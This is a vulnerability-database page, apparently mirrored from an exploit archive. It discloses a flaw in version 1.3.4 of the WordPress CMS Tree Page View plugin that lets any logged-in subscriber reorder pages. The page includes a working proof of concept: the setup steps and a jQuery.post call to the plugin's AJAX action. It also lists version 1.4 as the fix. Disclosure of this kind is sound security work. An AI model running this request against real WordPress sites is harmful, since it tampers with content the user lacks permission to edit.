Vulners
Lucene search
WordPress CMS Tree Page View 1.3.4 plugin Privilege Escalation Vulnerability
Vulnerability
Any logged in user can move pages, regardless of their permission level.
Proof of concept
Create a blank WordPress site, activate CMS Tree Page View plugin, and log in as admin
Publish a new page, to accompany the “Sample page” WordPress creates by default
Note the order of the two pages in the “Pages Tree” panel on the admin dashboard, and their corresponding IDs. In our example, page with ID 4 is at the top of the tree, followed by page with ID 2.
Log out, and log back in as a subscriber, with standard subscriber permissions (i.e. no edit capabilities)
Visit /wp-admin/
In the console, run:
jQuery.post(ajaxurl, {
action: "cms_tpv_move_page",
"node_id": 4,
"ref_node_id": 2,
"type": ‘after’,
"icl_post_language": 'en'
}, function(data, textStatus) {
});
Log out, and log back in as admin. The “Pages Tree” panel should now show page with ID 2 at the top, with page ID 4 second (i.e. the reverse of before).
Mitigation/further actions
Upgrade to version 1.4.
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2017 00:00Current
6.9Medium risk
Vulners AI Score6.9